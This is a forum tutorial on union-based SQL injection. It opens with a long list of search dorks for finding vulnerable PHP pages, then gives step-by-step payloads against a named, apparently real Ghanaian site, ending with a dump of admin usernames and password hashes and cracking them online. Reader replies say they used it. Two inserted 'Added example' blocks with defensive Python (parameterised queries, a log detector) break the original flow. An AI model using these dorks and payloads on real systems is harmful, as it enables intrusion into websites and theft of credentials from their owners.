inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: filesize()
"id=" & intext:"Warning: require()
To check manually whether a site is vulnerable, just add ' at the end of the URL:
For example, we have our target,
Code:
http://www.cocobod.gh/news_details.php?id=30
Now, we want to check if this is SQLi vulnerable, so we add ' at the end:
Code:
http://www.cocobod.gh/news_details.php?id=30'
If we get an error, that means that the site is vulnerable!
So, now we move on to the next step.
How To Find Columns Count:
After you have your vulnerable site, you need to know its column count. To do this, just add "order by X--" at the end of the URL,
where X is a number from 1 upward.
For example, we have our target server and we try to count columns:
we add order by 1-- at the end, then order by 2--, etc. Always increase the number until you get an error in your
So, in our target server, we have tried this:
Code:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
That means that the 8th column does not exist, so the column count is 7!
How to Find The Accessible Columns:
Now we know the column count, which is 7. The next step is to check for accessible columns. To do that, we use the query "UNION SELECT number,of,columns--" like this:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--
You will get something like this:
That means that we can get information from the site from the 6th, the 2nd and the 3rd column!
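Added example (not part of the original post): why the quote test and the order by / union select probes above work against a query built by string concatenation, and how integer validation plus a bound parameter stops all three. It assumes a constructed 7-column news table and uses Python's sqlite3 as a stand-in for the MySQL backend; the table and function names are hypothetical.

```python
import re
import sqlite3

def make_db():
    # Constructed 7-column table standing in for the backend of news_details.php.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT,"
               " author TEXT, created TEXT, tags TEXT, views INTEGER)")
    db.execute("INSERT INTO news VALUES"
               " (30, 'Title', 'Body', 'editor', '2012-01-01', 'misc', 5)")
    return db

def fetch_vulnerable(db, raw_id):
    # "Before": the request value is pasted straight into the SQL text.
    try:
        return db.execute("SELECT * FROM news WHERE id = " + raw_id).fetchall()
    except sqlite3.Error as exc:
        # Echoing the database error is what makes the quote test observable.
        return "SQL error: %s" % exc

def fetch_hardened(db, raw_id):
    # "After": accept only a short run of ASCII digits, then bind the value
    # as a parameter so it can never be parsed as SQL.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []  # reject; log server-side and show a generic not-found page
    return db.execute("SELECT * FROM news WHERE id = ?", (int(raw_id),)).fetchall()

# Request values taken from the steps above.
PROBES = ["30'", "30 order by 7--", "30 order by 8--",
          "30 union select 1,2,3,4,5,6,7--"]

def compare(db):
    # Map each probe to (vulnerable result, hardened result).
    return {p: (fetch_vulnerable(db, p), fetch_hardened(db, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, (before, after) in compare(make_db()).items():
        print(repr(probe), "->", before, "|", after)
```

The hardened function also keeps database errors out of the response, which removes the signal the quote test depends on.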
How To Get MySQL DB Version:
We need to know the MySQL DB version to know whether we can exploit this site or not, because you won't be able to work on any site that is using MySQL 4.x.x, but every 5.x.x or above is exploitable.
So to find the MySQL DB version, just replace the number of the used column with "@@version".
For example:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--
That means that we can continue working on this site.
How To Find Database Name:
Now we are going to inject the site to find the DB name.
To do this, replace the used column number with "group_concat(schema_name)", and add "from information_schema.schemata--" after the last column number, for example:
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(schema_name),7 from
information_schema.schemata--
Now, to get the one the website uses, replace "group_concat(schema_name)" with "concat(database())", for example:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Congrats, you got the used DB!
How to Get The Table Names:
Now we need to get the table names. To do this, replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" after the last column number.
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(table_name),7 from
information_schema.tables where table_schema=database()--
How To Get Column Names:
To get column names, we will use this query:
group_concat(column_name)
from information_schema.columns where table_schema=database()--
Example:
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(column_name),7 from
information_schema.columns where table_schema=database()--
How To Get Information From Columns:
Now we are at our final step: getting the admin info from the columns. How to do it?
Simple, follow this example:
Code:
http://www.site.com/news_details.php?id=30
union select
1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from
currentdb.tableused--
So our exploit will be like this:
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from
cocobod_gh.coc_admin--
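Added example (not part of the original post): the steps above leave a recognisable sequence in a web server access log, so this sketch labels each request by the step it matches and groups the labels per client address. The log lines, host paths and addresses are constructed, and the stage names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

STAGES = [  # (label, pattern) for each step the tutorial walks through
    ("quote-test", re.compile(r"=\d+'")),
    ("column-count", re.compile(r"\border\s+by\s+\d+")),
    ("union-probe", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("version", re.compile(r"@@version")),
    ("schema-enum", re.compile(r"information_schema\.(schemata|tables|columns)")),
    ("dump", re.compile(r"group_concat\s*\(")),
]
REQ = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')

def normalise(target):
    # Decode %xx and '+', drop /**/ comments, collapse whitespace, lowercase.
    text = unquote_plus(target)
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).lower()

def scan(lines):
    hits = defaultdict(list)  # client IP -> stage labels in first-seen order
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        ip, target = m.groups()
        query = normalise(target.partition("?")[2])
        for label, pat in STAGES:
            if pat.search(query) and label not in hits[ip]:
                hits[ip].append(label)
    return {ip: stages for ip, stages in hits.items() if stages}

# Constructed access-log lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /news_details.php?id=30%27 HTTP/1.1" 500 312',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /news_details.php?id=30+order+by+8-- HTTP/1.1" 500 298',
    '203.0.113.7 - - [01/Jan/2024:10:00:21 +0000] "GET /news_details.php?id=30%20UNION%20SELECT%201,2,3,4,5,@@version,7-- HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /news_details.php?id=31 HTTP/1.1" 200 4876',
    '198.51.100.4 - - [01/Jan/2024:10:01:30 +0000] "GET /search.php?q=union+station+order+by+phone HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(stages))
```

A single label can be noise; two or more stages from one address in a short window is the pattern worth alerting on.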
Now we need to recover the password, which is stored as an MD5 hash:
go to http://www.md5decrypter.co.uk/, paste your hash, fill in the captcha and click on decrypt. With a little luck, you will get the password, like here:
We have successfully injected a website and got the admin info! Thank you for reading my TuT!
Thanks so much, I'm stuck on the last step, everything worked perfectly, but I'm not getting any results (No SQL errors either) D:
Great tutorial, bro, I've already put it into practice and it worked..